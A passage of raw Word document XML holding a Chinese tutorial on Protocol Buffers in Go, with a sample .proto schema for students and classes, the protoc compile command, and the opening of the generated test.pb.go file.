          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30C4CC" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    class2=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA92C3" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    class3=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD15B6" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96BCE8" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>message Student{ //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>消息，对应于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA0FA9" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  string name=1; //1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>标号，唯一</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>即可（相当于数据库中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，不一定要从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的顺序依次排列。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73979823" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  int32 age=2;  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>必须指定整型的范围，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>int32</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>int64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B47D70" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  string address=3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CFBF1" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  ClassName cn=4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A269E" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C83B9C" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>message Students{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3C30F" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">   repeated Student person=1;  // repeated </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>修饰，相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>中切片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F0C29" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">   string school=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40026872" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866F6C8" w14:textId="4A1C3F9A" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C0CBC4" w14:textId="062DC8B3" w:rsidR="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52358585" w14:textId="77777777" w:rsidR="00821BCE" w:rsidRDefault="00821BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">protoc --go_out=. test.proto  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（其中：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.proto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上内容对应的文件名）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A502EE2" w14:textId="77777777" w:rsidR="00821BCE" w:rsidRDefault="00821BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D579266" w14:textId="4790D196" w:rsidR="00DC6177" w:rsidRDefault="00821BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.pb.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321263E" w14:textId="59C51162" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351D9B55" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// Code generated by protoc-gen-go. DO NOT EDIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCCF17" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// source: test.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71017C92" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6114D75C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796DB08" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DB059" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32433CA5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>proto "github.com/golang/protobuf/proto"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A5896" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>math "math"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A559BE" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70B367" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// Reference imports to suppress errors if they are not otherwise used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F470B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var _ = proto.Marshal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975358E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>var _ = fmt.Errorf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60946A24" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var _ = math.Inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B8D3F3" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// This is a compile-time assertion to ensure that this generated file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A7E832" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// is compatible with the proto package it is being compiled against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583949D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// A compilation error at this line likely means your copy of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E92BB2" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// proto package needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E0B46" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4384CD" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type ClassName int32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A766D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>const (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE1827" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ClassName_class1 ClassName = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE16104" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ClassName_class2 ClassName = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453AFEA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ClassName_class3 ClassName = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49909F90" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C464562" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var ClassName_name = map[int32]string{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE093EC" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0: "class1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48979DF9" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>1: "class2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94401B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>2: "class3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C462C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CCAAED" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var ClassName_value = map[string]int32{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C60EA2" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
